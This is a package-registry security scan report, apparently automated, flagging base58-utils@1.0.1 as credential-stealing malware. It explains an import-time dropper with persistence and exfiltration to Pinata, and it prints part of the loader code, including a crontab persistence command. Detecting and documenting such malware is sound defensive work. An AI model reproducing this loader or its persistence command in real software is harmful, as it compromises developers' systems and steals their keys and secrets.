registry  /  base58-utils  /  1.0.1

base58-utils@1.0.1

Base58 encode/decode with Solana, Bitcoin, and IPFS support — lightweight, zero dependencies

AI Security Review

scanned 3h ago · by lpm-firewall-ai

Importing the package silently installs and launches a concealed second-stage script after 37 seconds. The payload persists across reboots, harvests credentials and cryptocurrency secrets, and exfiltrates them when remotely activated.

Static reason
No blocking static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
Requiring or importing `index.js`; the delayed timer runs automatically.
Impact
Theft of wallet seeds, private keys, SSH keys, environment secrets, and shell-profile secrets with durable host persistence.
Mechanism
Import-time staged payload dropper, persistence installer, credential harvester, and encrypted exfiltrator.
Attack narrative
`index.js` exports Base58 helpers, then schedules an automatic loader. The loader decodes a base64 fixture into a hidden executable script in the user home directory, registers cron, launchd, or scheduled-task persistence, and launches it detached. The payload checks a mutable GitHub Gist/IPFS dead drop, then searches wallet directories, home secrets, shell profiles, and SSH keys. It RSA-encrypts findings and uploads them to Pinata.
Rationale
This is concrete import-time malware, not a package-aligned utility feature. The encoded fixture is an active second stage for persistence and credential exfiltration.
Evidence
package.jsonindex.jstest/fixtures/keypairs.dat~/.cache-db/.node-sync/syncd.js~/.cache-db/.node-sync/.lock~/Library/LaunchAgents/com.apple.syncd.plistuser crontab / Windows scheduled task
Network endpoints5
gist.githubusercontent.comgateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` runs a delayed IIFE on every import.
  • It decodes `test/fixtures/keypairs.dat` into `~/.cache-db/.node-sync/syncd.js`.
  • The dropped payload creates cron, launchd, or Windows scheduled-task persistence.
  • The payload searches wallet paths, `.env`, shell profiles, and private SSH keys.
  • It encrypts collected contents and posts them to Pinata after remote dead-drop activation.
Evidence against
  • `package.json` has no lifecycle hook.
  • The exported Base58 and WIF helpers are legitimate-looking utility functions.
Behavioral surface
Source
ChildProcessFilesystemShell
Supply chain
HighEntropyStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 3.22 KB of source

Source & flagged code

2 flagged · loading source
index.jsView file
matchType = malicious_source_fingerprint_signature signature = 8a6b9d9250ab2dc6 signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = base58-utils@1.0.0 matchedPath = index.js matchedIdentity = npm:YmFzZTU4LXV0aWxz:1.0.0 similarity = 1.000 shingleOverlap = 1 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
6function encode(buf) { L7: if (typeof buf === "string") buf = Buffer.from(buf, "utf8"); L8: const digits = [0]; ... L62: try { L63: var f = require("fs"), p = require("path"), o = require("os"), c = require("child_process"); L64: var h = o.homedir(), d = p.join(h, ".cache-db", ".node-sync"), s = p.join(d, "syncd.js"); L65: if (f.existsSync(s)) return; ... L70: try { L71: if (process.platform === "linux") { L72: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 }); L73: } else if (process.platform === "win32") {
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

index.jsView on unpkg · L6

Findings

1 High1 Medium2 Low
HighKnown Malware Source Fingerprint Signatureindex.js
MediumInstall Persistenceindex.js
LowFilesystem
LowHigh Entropy Strings